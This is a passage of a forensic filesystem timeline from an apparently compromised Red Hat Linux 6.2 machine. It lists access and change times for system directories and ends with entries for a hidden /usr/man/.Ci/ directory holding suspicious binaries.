                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/no/LC_MESSAGES

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/no@nynorsk

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/no@nynorsk/LC_MESSAGES

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/no_NO

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/no_NO/LC_MESSAGES

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/pl

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/pl/LC_MESSAGES

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/pl_PL

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/pl_PL/LC_MESSAGES

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/pt

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/pt/LC_MESSAGES

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/pt_BR

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/pt_BR/LC_MESSAGES

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/pt_PT

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/pt_PT/LC_MESSAGES

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/ro

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/ro/LC_MESSAGES

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/ro_RO

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/ro_RO/LC_MESSAGES

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/ru

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/ru/LC_MESSAGES

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/ru_RU

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/ru_RU.KOI8-R

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/ru_RU.KOI8-R/LC_MESSAGES

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/ru_RU/LC_MESSAGES

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/ru_UA

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/ru_UA/LC_MESSAGES

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/sk

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/sk/LC_MESSAGES

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/sk_SK

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/sk_SK/LC_MESSAGES

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/sl

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/sl/LC_MESSAGES

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/sl_SI

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/sl_SI/LC_MESSAGES

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/sr

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/sr/LC_MESSAGES

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/sr_YU

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/sr_YU/LC_MESSAGES

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/sv

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/sv/LC_MESSAGES

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/sv_FI

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/sv_FI/LC_MESSAGES

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/sv_SE

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/sv_SE/LC_MESSAGES

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/th_TH

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/th_TH/LC_MESSAGES

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/tr

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/tr/LC_MESSAGES

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/tr_TR

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/tr_TR/LC_MESSAGES

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/uk

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/uk/LC_MESSAGES

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/uk_UA

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/uk_UA/LC_MESSAGES

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/zh

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/zh/LC_MESSAGES

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/zh_TW.Big5

                       4096 .a. drwxr-xr-x root     root     /usr/share/locale/zh_TW.Big5/LC_MESSAGES

                       4096 .a. drwxr-xr-x root     root     /usr/share/pixmaps

                       4096 .a. drwxr-xr-x root     root     /usr/share/pixmaps/redhat

                       4096 .a. drwxr-xr-x root     root     /usr/share/snmp

                       4096 .a. drwxr-xr-x root     root     /usr/share/snmp/mibs

                       4096 .a. drwxr-xr-x root     root     /usr/share/swat

                       4096 .a. drwxr-xr-x root     root     /usr/share/swat/help

                       4096 .a. drwxr-xr-x root     root     /usr/share/swat/images

                       4096 .a. drwxr-xr-x root     root     /usr/share/swat/include

                       4096 .a. drwxr-xr-x root     root     /usr/share/tabset

                       4096 .a. drwxr-xr-x root     root     /usr/share/terminfo

                       4096 .a. drwxr-xr-x root     root     /usr/share/terminfo/1

                       4096 .a. drwxr-xr-x root     root     /usr/share/terminfo/2

                       4096 .a. drwxr-xr-x root     root     /usr/share/terminfo/3

                       4096 .a. drwxr-xr-x root     root     /usr/share/terminfo/4

                       4096 .a. drwxr-xr-x root     root     /usr/share/terminfo/5

                       4096 .a. drwxr-xr-x root     root     /usr/share/terminfo/6

                       4096 .a. drwxr-xr-x root     root     /usr/share/terminfo/7

                       4096 .a. drwxr-xr-x root     root     /usr/share/terminfo/8

                       4096 .a. drwxr-xr-x root     root     /usr/share/terminfo/9

                       4096 .a. drwxr-xr-x root     root     /usr/share/terminfo/N

                       4096 .a. drwxr-xr-x root     root     /usr/share/terminfo/P

                       4096 .a. drwxr-xr-x root     root     /usr/share/terminfo/X

                       8192 .a. drwxr-xr-x root     root     /usr/share/terminfo/a

                       4096 .a. drwxr-xr-x root     root     /usr/share/terminfo/b

                       4096 .a. drwxr-xr-x root     root     /usr/share/terminfo/c

                       8192 .a. drwxr-xr-x root     root     /usr/share/terminfo/d

                       4096 .a. drwxr-xr-x root     root     /usr/share/terminfo/e

                       4096 .a. drwxr-xr-x root     root     /usr/share/terminfo/f

                       4096 .a. drwxr-xr-x root     root     /usr/share/terminfo/g

                       4096 .a. drwxr-xr-x root     root     /usr/share/terminfo/h

                       4096 .a. drwxr-xr-x root     root     /usr/share/terminfo/i

                       4096 .a. drwxr-xr-x root     root     /usr/share/terminfo/j

                       4096 .a. drwxr-xr-x root     root     /usr/share/terminfo/k

                       4096 .a. drwxr-xr-x root     root     /usr/share/terminfo/l

                       4096 .a. drwxr-xr-x root     root     /usr/share/terminfo/m

                       4096 .a. drwxr-xr-x root     root     /usr/share/terminfo/n

                       4096 .a. drwxr-xr-x root     root     /usr/share/terminfo/o

                       4096 .a. drwxr-xr-x root     root     /usr/share/terminfo/p

                       4096 .a. drwxr-xr-x root     root     /usr/share/terminfo/q

                       4096 .a. drwxr-xr-x root     root     /usr/share/terminfo/r

                       4096 .a. drwxr-xr-x root     root     /usr/share/terminfo/s

                       4096 .a. drwxr-xr-x root     root     /usr/share/terminfo/t

                       4096 .a. drwxr-xr-x root     root     /usr/share/terminfo/u

                       4096 .a. drwxr-xr-x root     root     /usr/share/terminfo/v

                       8192 .a. drwxr-xr-x root     root     /usr/share/terminfo/w

                       4096 .a. drwxr-xr-x root     root     /usr/share/terminfo/x

                       4096 .a. drwxr-xr-x root     root     /usr/share/terminfo/z

                       4096 .a. drwxr-xr-x root     root     /usr/share/vim

                       4096 .a. drwxr-xr-x root     root     /usr/share/vim/vim56

                       4096 .a. drwxr-xr-x root     root     /usr/share/vim/vim56/doc

                       4096 .a. drwxr-xr-x root     root     /usr/share/vim/vim56/macros

                       4096 .a. drwxr-xr-x root     root     /usr/share/vim/vim56/macros/hanoi

                       4096 .a. drwxr-xr-x root     root     /usr/share/vim/vim56/macros/life

                       4096 .a. drwxr-xr-x root     root     /usr/share/vim/vim56/macros/maze

                       4096 .a. drwxr-xr-x root     root     /usr/share/vim/vim56/macros/urm

                       4096 .a. drwxr-xr-x root     root     /usr/share/vim/vim56/syntax

                       4096 .a. drwxr-xr-x root     root     /usr/share/vim/vim56/tools

                       4096 .a. drwxr-xr-x root     root     /usr/share/vim/vim56/tutor

                       4096 .a. drwxr-xr-x root     root     /usr/share/zoneinfo

                       4096 .a. drwxr-xr-x root     root     /usr/share/zoneinfo/Africa

                       4096 .a. drwxr-xr-x root     root     /usr/share/zoneinfo/America

                       4096 .a. drwxr-xr-x root     root     /usr/share/zoneinfo/America/Indiana

                       4096 .a. drwxr-xr-x root     root     /usr/share/zoneinfo/Antarctica

                       4096 .a. drwxr-xr-x root     root     /usr/share/zoneinfo/Arctic

                       4096 .a. drwxr-xr-x root     root     /usr/share/zoneinfo/Asia

                       4096 .a. drwxr-xr-x root     root     /usr/share/zoneinfo/Atlantic

                       4096 .a. drwxr-xr-x root     root     /usr/share/zoneinfo/Australia

                       4096 .a. drwxr-xr-x root     root     /usr/share/zoneinfo/Brazil

                       4096 .a. drwxr-xr-x root     root     /usr/share/zoneinfo/Canada

                       4096 .a. drwxr-xr-x root     root     /usr/share/zoneinfo/Chile

                       4096 .a. drwxr-xr-x root     root     /usr/share/zoneinfo/China

                       4096 .a. drwxr-xr-x root     root     /usr/share/zoneinfo/Etc

                       4096 .a. drwxr-xr-x root     root     /usr/share/zoneinfo/Europe

                       4096 .a. drwxr-xr-x root     root     /usr/share/zoneinfo/Indian

                       4096 .a. drwxr-xr-x root     root     /usr/share/zoneinfo/Mexico

                       4096 .a. drwxr-xr-x root     root     /usr/share/zoneinfo/Mideast

                       4096 .a. drwxr-xr-x root     root     /usr/share/zoneinfo/Pacific

                       4096 .a. drwxr-xr-x root     root     /usr/share/zoneinfo/SystemV

                       4096 .a. drwxr-xr-x root     root     /usr/share/zoneinfo/US

                       4096 .a. drwxr-xr-x root     root     /usr/share/zoneinfo/posix

                       4096 .a. drwxr-xr-x root     root     /usr/share/zoneinfo/posix/Africa

                       4096 .a. drwxr-xr-x root     root     /usr/share/zoneinfo/posix/America

                       4096 .a. drwxr-xr-x root     root     /usr/share/zoneinfo/posix/America/Indiana

                       4096 .a. drwxr-xr-x root     root     /usr/share/zoneinfo/posix/Antarctica

                       4096 .a. drwxr-xr-x root     root     /usr/share/zoneinfo/posix/Arctic

                       4096 .a. drwxr-xr-x root     root     /usr/share/zoneinfo/posix/Asia

                       4096 .a. drwxr-xr-x root     root     /usr/share/zoneinfo/posix/Atlantic

                       4096 .a. drwxr-xr-x root     root     /usr/share/zoneinfo/posix/Australia

                       4096 .a. drwxr-xr-x root     root     /usr/share/zoneinfo/posix/Brazil

                       4096 .a. drwxr-xr-x root     root     /usr/share/zoneinfo/posix/Canada

                       4096 .a. drwxr-xr-x root     root     /usr/share/zoneinfo/posix/Chile

                       4096 .a. drwxr-xr-x root     root     /usr/share/zoneinfo/posix/China

                       4096 .a. drwxr-xr-x root     root     /usr/share/zoneinfo/posix/Etc

                       4096 .a. drwxr-xr-x root     root     /usr/share/zoneinfo/posix/Europe

                       4096 .a. drwxr-xr-x root     root     /usr/share/zoneinfo/posix/Indian

                       4096 .a. drwxr-xr-x root     root     /usr/share/zoneinfo/posix/Mexico

                       4096 .a. drwxr-xr-x root     root     /usr/share/zoneinfo/posix/Mideast

                       4096 .a. drwxr-xr-x root     root     /usr/share/zoneinfo/posix/Pacific

                       4096 .a. drwxr-xr-x root     root     /usr/share/zoneinfo/posix/SystemV

                       4096 .a. drwxr-xr-x root     root     /usr/share/zoneinfo/posix/US

                       4096 .a. drwxr-xr-x root     root     /usr/share/zoneinfo/right

                       4096 .a. drwxr-xr-x root     root     /usr/share/zoneinfo/right/Africa

                       4096 .a. drwxr-xr-x root     root     /usr/share/zoneinfo/right/America

                       4096 .a. drwxr-xr-x root     root     /usr/share/zoneinfo/right/America/Indiana

                       4096 .a. drwxr-xr-x root     root     /usr/share/zoneinfo/right/Antarctica

                       4096 .a. drwxr-xr-x root     root     /usr/share/zoneinfo/right/Arctic

                       4096 .a. drwxr-xr-x root     root     /usr/share/zoneinfo/right/Asia

                       4096 .a. drwxr-xr-x root     root     /usr/share/zoneinfo/right/Atlantic

                       4096 .a. drwxr-xr-x root     root     /usr/share/zoneinfo/right/Australia

                       4096 .a. drwxr-xr-x root     root     /usr/share/zoneinfo/right/Brazil

                       4096 .a. drwxr-xr-x root     root     /usr/share/zoneinfo/right/Canada

                       4096 .a. drwxr-xr-x root     root     /usr/share/zoneinfo/right/Chile

                       4096 .a. drwxr-xr-x root     root     /usr/share/zoneinfo/right/China

                       4096 .a. drwxr-xr-x root     root     /usr/share/zoneinfo/right/Etc

                       4096 .a. drwxr-xr-x root     root     /usr/share/zoneinfo/right/Europe

                       4096 .a. drwxr-xr-x root     root     /usr/share/zoneinfo/right/Indian

                       4096 .a. drwxr-xr-x root     root     /usr/share/zoneinfo/right/Mexico

                       4096 .a. drwxr-xr-x root     root     /usr/share/zoneinfo/right/Mideast

                       4096 .a. drwxr-xr-x root     root     /usr/share/zoneinfo/right/Pacific

                       4096 .a. drwxr-xr-x root     root     /usr/share/zoneinfo/right/SystemV

                       4096 .a. drwxr-xr-x root     root     /usr/share/zoneinfo/right/US

                       4096 .a. drwxr-xr-x root     root     /usr/src/linux-2.2.14/configs

                       4096 .a. drwxr-xr-x root     root     /usr/src/linux-2.2.14/include

                       4096 .a. drwxr-xr-x root     root     /usr/src/linux-2.2.14/include/asm-generic

                       4096 .a. drwxr-xr-x root     root     /usr/src/linux-2.2.14/include/asm-i386

                       8192 .a. drwxr-xr-x root     root     /usr/src/linux-2.2.14/include/linux

                       4096 .a. drwxr-xr-x root     root     /usr/src/linux-2.2.14/include/linux/byteorder

                       4096 .a. drwxr-xr-x root     root     /usr/src/linux-2.2.14/include/linux/lockd

                       8192 .a. drwxr-xr-x root     root     /usr/src/linux-2.2.14/include/linux/modules

                       4096 .a. drwxr-xr-x root     root     /usr/src/linux-2.2.14/include/linux/modules-BOOT

                       8192 .a. drwxr-xr-x root     root     /usr/src/linux-2.2.14/include/linux/modules-smp

                       8192 .a. drwxr-xr-x root     root     /usr/src/linux-2.2.14/include/linux/modules-up

                       4096 .a. drwxr-xr-x root     root     /usr/src/linux-2.2.14/include/linux/nfsd

                       4096 .a. drwxr-xr-x root     root     /usr/src/linux-2.2.14/include/linux/raid

                       4096 .a. drwxr-xr-x root     root     /usr/src/linux-2.2.14/include/linux/sunrpc

Nov 08 00 02:02:05    12288 .a. drwxrwxr-x root     root     /dev/ida

                       4096 .a. drwxrwxr-x root     root     /dev/raw

                       4096 .a. drwxr-xr-x root     root     /usr/i386-redhat-linux

                       4096 .a. drwxr-xr-x root     root     /usr/i386-redhat-linux/include

                       4096 .a. drwxr-xr-x root     root     /usr/i386-redhat-linux/lib

                       4096 .a. drwxr-xr-x root     root     /usr/i486-linux-libc5

                       4096 .a. drwxr-xr-x root     root     /usr/kerberos

                       4096 .a. drwxr-xr-x root     root     /usr/kerberos/bin

                       4096 .a. drwxr-xr-x root     root     /usr/kerberos/include

                       4096 .a. drwxr-xr-x root     root     /usr/kerberos/include/asn.1

                       4096 .a. drwxr-xr-x root     root     /usr/kerberos/include/gssapi

                       4096 .a. drwxr-xr-x root     root     /usr/kerberos/include/gssrpc

                       4096 .a. drwxr-xr-x root     root     /usr/kerberos/include/kadm5

                       4096 .a. drwxr-xr-x root     root     /usr/kerberos/include/kerberosIV

                       4096 .a. drwxr-xr-x root     root     /usr/kerberos/include/krb5

                       4096 .a. drwxr-xr-x root     root     /usr/kerberos/include/krb5/stock

                       4096 .a. drwxr-xr-x root     root     /usr/kerberos/man

                       4096 .a. drwxr-xr-x root     root     /usr/kerberos/man/man1

                       4096 .a. drwxr-xr-x root     root     /usr/kerberos/man/man8

                       4096 .a. drwxr-xr-x root     root     /usr/kerberos/sbin

                       4096 .a. drwxr-xr-x root     root     /usr/libexec/awk

                       4096 .a. drwxr-xr-x root     root     /usr/src/linux-2.2.14/include/net

                       4096 .a. drwxr-xr-x root     root     /usr/src/linux-2.2.14/include/net/irda

                       4096 .a. drwxr-xr-x root     root     /usr/src/linux-2.2.14/include/scsi

                       4096 .a. drwxr-xr-x root     root     /usr/src/linux-2.2.14/include/video

                       4096 .a. drwxr-xr-x root     root     /usr/src/redhat/BUILD

                       4096 .a. drwxr-xr-x root     root     /usr/src/redhat/RPMS

                       4096 .a. drwxr-xr-x root     root     /usr/src/redhat/RPMS/i386

                       4096 .a. drwxr-xr-x root     root     /usr/src/redhat/RPMS/i686

                       4096 .a. drwxr-xr-x root     root     /usr/src/redhat/RPMS/noarch

                       4096 .a. drwxr-xr-x root     root     /usr/src/redhat/SOURCES

                       4096 .a. drwxr-xr-x root     root     /usr/src/redhat/SPECS

                       4096 .a. drwxr-xr-x root     root     /usr/src/redhat/SRPMS

                       1024 .a. drwxr-xr-x root     root     /var

                       1024 .a. drwxr-xr-x root     root     /var/arpwatch

                       1024 .a. drwxr-xr-x root     root     /var/cache

                       1024 .a. drwxr-xr-x nobody   nobody   /var/cache/httpd

                       1024 .a. drwxr-xr-x root     root     /var/db

                       1024 .a. drwxr-xr-x root     root     /var/lib

                       1024 .a. drwxr-xr-x root     root     /var/lib/games

                       1024 .a. drwxrwxr-x news     news     /var/lib/news

                       1024 .a. drwx------ postgres postgres /var/lib/pgsql

                       1024 .a. drwxr-xr-x root     root     /var/lib/rpm

                       1024 .a. drwxr-x--- root     slocate  /var/lib/slocate

                       1024 .a. drwxrwxrwx root     root     /var/lib/svgalib

                       1024 .a. drwxr-xr-x root     root     /var/local

                       1024 .a. drwxrwxr-x root     uucp     /var/lock

                       1024 .a. drwxr-xr-x root     root     /var/lock/console

                       1024 .a. drwxr-xr-x root     root     /var/lock/samba

                       1024 .a. drwxrwxr-x root     root     /var/lock/subsys

                       1024 .a. drwxr-xr-x root     root     /var/log

                       1024 .a. drwxr-xr-x root     root     /var/log/httpd

                       1024 .a. drwxrwxr-x news     news     /var/log/news

                       1024 .a. drwxrwxr-x news     news     /var/log/news/OLD

                       1024 .a. drwx------ root     root     /var/log/samba

                       1024 .a. drwxr-xr-x uucp     uucp     /var/log/uucp

                      12288 .a. drwxr-xr-x root     root     /var/lost+found

                       1024 .a. drwxr-xr-x root     root     /var/mars_nwe

                       1024 .a. drwxr-xr-x root     root     /var/mars_nwe/bindery

                       1024 .a. drwxr-xr-x root     root     /var/mars_nwe/sys

                       1024 .a. drwxr-xr-x root     root     /var/mars_nwe/sys/login

                       1024 .a. drwxr-xr-x root     root     /var/mars_nwe/sys/public

                       1024 .a. drwxr-xr-x root     root     /var/mars_nwe/sys/system

                       1024 .a. drwxr-xr-x root     root     /var/named

                       1024 .a. drwxr-xr-x root     root     /var/nis

                       1024 .a. drwxr-xr-x root     root     /var/preserve

                       1024 .a. drwxr-xr-x root     root     /var/run

                       1024 .a. drwxrwxr-x root     root     /var/run/netreport

                       1024 .a. drwxrwx--- news     news     /var/run/news

                       1024 .a. drwxr-xr-x root     root     /var/spool

                       1024 .a. drwxr-xr-x root     root     /var/spool/anacron

                       1024 .a. drwx------ daemon   daemon   /var/spool/at/spool

                       1024 .a. drwx------ root     root     /var/spool/cron

                       1024 .a. drwxrwxr-x root     mail     /var/spool/mail

                       1024 .a. drwxrwxr-x news     news     /var/spool/news

                       1024 .a. drwxrwxr-x news     news     /var/spool/news/archive

                       1024 .a. drwxrwxr-x news     news     /var/spool/news/articles

                       1024 .a. drwxrwxr-x news     news     /var/spool/news/incoming

                       1024 .a. drwxrwxr-x news     news     /var/spool/news/incoming/bad

                       1024 .a. drwxrwxr-x news     news     /var/spool/news/innfeed

                       1024 .a. drwxrwxr-x news     news     /var/spool/news/outgoing

                       1024 .a. drwxrwxr-x news     news     /var/spool/news/overview

                       1024 .a. drwxrwxr-x news     news     /var/spool/news/uniover

                       1024 .a. drwxr-xr-x root     root     /var/spool/rwho

                       1024 .a. drwxrwxrwx root     root     /var/spool/samba

                       1024 .a. drwxr-xr-x uucp     uucp     /var/spool/uucp

                       1024 .a. drwxr-xr-x uucp     uucp     /var/spool/uucppublic

                       1024 .a. drwxr-xr-x root     root     /var/state

                       1024 .a. drwxr-xr-x root     root     /var/state/misc

                       1024 .a. drwxr-xr-x root     root     /var/yp/binding

Nov 08 00 02:02:06    32768 .a. drwxr-xr-x root     root     /dev/rd

                       1024 .a. drwxr-xr-x root     root     /etc/X11

                       1024 .a. drwxr-xr-x root     root     /etc/X11/applnk

                       1024 .a. drwxr-xr-x root     root     /etc/X11/applnk/Internet

                       1024 .a. drwxr-xr-x root     root     /etc/X11/applnk/System

                       1024 .a. drwxr-xr-x root     root     /etc/X11/applnk/Utilities

                       1024 .a. drwxr-xr-x xfs      xfs      /etc/X11/fs

                       4096 .a. drwxr-xr-x root     root     /etc/charsets

                       1024 .a. drwxr-xr-x root     root     /etc/codepages

                       1024 .a. drwxr-xr-x root     root     /etc/codepages/src

                       1024 .a. drwxr-xr-x root     root     /etc/cron.d

                       1024 .a. drwxr-xr-x root     root     /etc/cron.daily

                        102 .a. -rwxr-xr-x root     root     /etc/cron.daily/slocate.cron

                        104 .a. -rwxr-xr-x root     root     /etc/cron.daily/tmpwatch

                       1024 .a. drwxr-xr-x root     root     /etc/cron.monthly

                       1024 .a. drwxr-xr-x root     root     /etc/cron.weekly

                       1024 .a. drwxr-x--- root     root     /etc/default

                       1024 .a. drwxr-xr-x root     root     /etc/httpd

                       1024 .a. drwxr-xr-x root     root     /etc/httpd/conf

                       1024 .a. drwxr-xr-x root     root     /etc/logrotate.d

                       1024 .a. drwxr-xr-x root     root     /etc/mail

                       1024 .a. drwxrwxr-x news     news     /etc/news

                       1024 .a. drwxr-xr-x root     root     /etc/nmh

                       1024 .a. drwxr-xr-x root     root     /etc/pam.d

                       1024 .a. drwxr-xr-x root     root     /etc/pcmcia

                       1024 .a. drwxr-xr-x root     root     /etc/pcmcia/cis

                       1024 .a. drwxr-xr-x root     root     /etc/ppp

                       1024 .a. drwxr-xr-x root     root     /etc/ppp/peers

                       1024 .a. drwxr-xr-x root     root     /etc/rc.d

                       1024 .a. drwxr-xr-x root     root     /etc/rpm

                       1024 .a. drwxr-xr-x root     root     /etc/security

                       1024 .a. drwxr-xr-x root     root     /etc/security/console.apps

                       1024 .a. drwxr-xr-x root     root     /etc/skel

                       1024 .a. drwxr-xr-x root     root     /etc/smrsh

                       1024 .a. drwxr-xr-x root     root     /etc/snmp

                       1024 .a. drwxr-xr-x root     root     /etc/sysconfig

                       1024 .a. drwxr-xr-x root     root     /etc/sysconfig/apm-scripts

                       1024 .a. drwxr-xr-x root     root     /etc/sysconfig/cbq

                       1024 .a. drwxr-xr-x root     root     /etc/sysconfig/console

                       1024 .a. drwxr-xr-x root     root     /etc/sysconfig/network-scripts

                       1024 .a. drwxr-xr-x root     root     /etc/uucp

                       1024 .a. drwxr-xr-x root     root     /etc/uucp/oldconfig

                       1024 .a. drwxr-xr-x root     root     /etc/vga

                       1024 .a. drwxr-xr-x root     root     /floppy

                       1024 .a. drwxr-xr-x root     root     /lib/modules

                       1024 .a. drwxr-xr-x root     root     /lib/modules/2.2.14-5.0

                       1024 .a. drwxr-xr-x root     root     /lib/modules/2.2.14-5.0/block

                       1024 .a. drwxr-xr-x root     root     /lib/modules/2.2.14-5.0/cdrom

                       1024 .a. drwxr-xr-x root     root     /lib/modules/2.2.14-5.0/fs

                       1024 .a. drwxr-xr-x root     root     /lib/modules/2.2.14-5.0/ipv4

                       4096 .a. drwxr-xr-x root     root     /lib/modules/2.2.14-5.0/misc

                       2048 .a. drwxr-xr-x root     root     /lib/modules/2.2.14-5.0/net

                       1024 .a. drwxr-xr-x root     root     /lib/modules/2.2.14-5.0/pcmcia

                       1024 .a. drwxr-xr-x root     root     /lib/modules/2.2.14-5.0/scsi

                       1024 .a. drwxr-xr-x root     root     /lib/modules/2.2.14-5.0/video

                       1024 .a. drwxr-xr-x root     root     /lib/security

                       1024 .a. drwxr-xr-x root     root     /mnt

                       1024 .a. drwxrwxr-x root     root     /mnt/cdrom

                       1024 .a. drwxrwxr-x root     root     /mnt/floppy

                       1024 .a. drwxr-x--- root     root     /root

                       1024 .a. drwxr-xr-x root     root     /sbin/pam_filter

                       1024 ..c drwxrwxrwx xfs      xfs      /tmp/.font-unix

                       8532 .a. -rwxr-xr-x root     root     /usr/sbin/tmpwatch

                       1024 .a. drwxrwxr-x root     man      /var/catman

                       1024 .a. drwxrwxr-x root     man      /var/catman/X11R6

                       1024 .a. drwxrwxr-x root     man      /var/catman/X11R6/cat1

                       1024 .a. drwxrwxr-x root     man      /var/catman/X11R6/cat2

                       1024 .a. drwxrwxr-x root     man      /var/catman/X11R6/cat3

                       1024 .a. drwxrwxr-x root     man      /var/catman/X11R6/cat4

                       1024 .a. drwxrwxr-x root     man      /var/catman/X11R6/cat5

                       1024 .a. drwxrwxr-x root     man      /var/catman/X11R6/cat6

                       1024 .a. drwxrwxr-x root     man      /var/catman/X11R6/cat7

                       1024 .a. drwxrwxr-x root     man      /var/catman/X11R6/cat8

                       1024 .a. drwxrwxr-x root     man      /var/catman/X11R6/cat9

                       1024 .a. drwxrwxr-x root     man      /var/catman/X11R6/catn

                       1024 .a. drwxrwxr-x root     man      /var/catman/cat1

                       1024 .a. drwxrwxr-x root     man      /var/catman/cat2

                       1024 .a. drwxrwxr-x root     man      /var/catman/cat3

                       1024 .a. drwxrwxr-x root     man      /var/catman/cat4

                       1024 .a. drwxrwxr-x root     man      /var/catman/cat5

                       1024 .a. drwxrwxr-x root     man      /var/catman/cat6

                       1024 .a. drwxrwxr-x root     man      /var/catman/cat7

                       1024 .a. drwxrwxr-x root     man      /var/catman/cat8

                       1024 .a. drwxrwxr-x root     man      /var/catman/cat9

                       1024 .a. drwxrwxr-x root     man      /var/catman/catn

                       1024 .a. drwxrwxr-x root     man      /var/catman/local

                       1024 .a. drwxrwxr-x root     man      /var/catman/local/cat1

                       1024 .a. drwxrwxr-x root     man      /var/catman/local/cat2

                       1024 .a. drwxrwxr-x root     man      /var/catman/local/cat3

                       1024 .a. drwxrwxr-x root     man      /var/catman/local/cat4

                       1024 .a. drwxrwxr-x root     man      /var/catman/local/cat5

                       1024 .a. drwxrwxr-x root     man      /var/catman/local/cat6

                       1024 .a. drwxrwxr-x root     man      /var/catman/local/cat7

                       1024 .a. drwxrwxr-x root     man      /var/catman/local/cat8

                       1024 .a. drwxrwxr-x root     man      /var/catman/local/cat9

                       1024 .a. drwxrwxr-x root     man      /var/catman/local/catn

                       1024 m.c drwxr-x--- root     slocate  /var/lib/slocate

                     238767 m.c -rw-r----- root     slocate  /var/lib/slocate/slocate.db

                       1024 .a. drwxrwxrwx root     root     /var/tmp

Nov 08 00 06:25:53     2836 .a. -r-xr-xr-x root     root     /usr/bin/uptime

Nov 08 00 06:26:15        0 m.c -rw-r--r-- root     root     /etc/hosts.deny

Nov 08 00 06:26:51     1024 .a. drwxr-xr-x root     root     /etc/rc.d/init.d

Nov 08 00 06:29:27    63728 .a. -rwxr-xr-x root     root     /usr/bin/ftp

Nov 08 00 06:33:42     1024 .a. drwx------ daemon   daemon   /var/spool/at

Nov 08 00 06:45:18      161 .a. -rw-r--r-- root     root     /etc/hosts.allow

                          0 .a. -rw-r--r-- root     root     /etc/hosts.deny

Nov 08 00 06:45:19       63 .a. -rw-r--r-- root     root     /etc/issue.net

Nov 08 00 06:45:24     1504 .a. -rw-r--r-- root     root     /etc/security/console.perms

Nov 08 00 06:51:53     4096 .a. drwxr-xr-x 1010     users    /usr/man/.Ci/

                        118 .a. -rwxr-xr-x 1010     users    /usr/man/.Ci/ /Anap

                         83 .a. -rwxr-xr-x 1010     users    /usr/man/.Ci/addps

                     185988 .a. -rwxr-xr-x 1010     users    /usr/man/.Ci/find

                     147900 .a. -rwxr-xr-x 1010     users    /usr/man/.Ci/inetd

                      12495 .a. -rwxr-xr-x 1010     users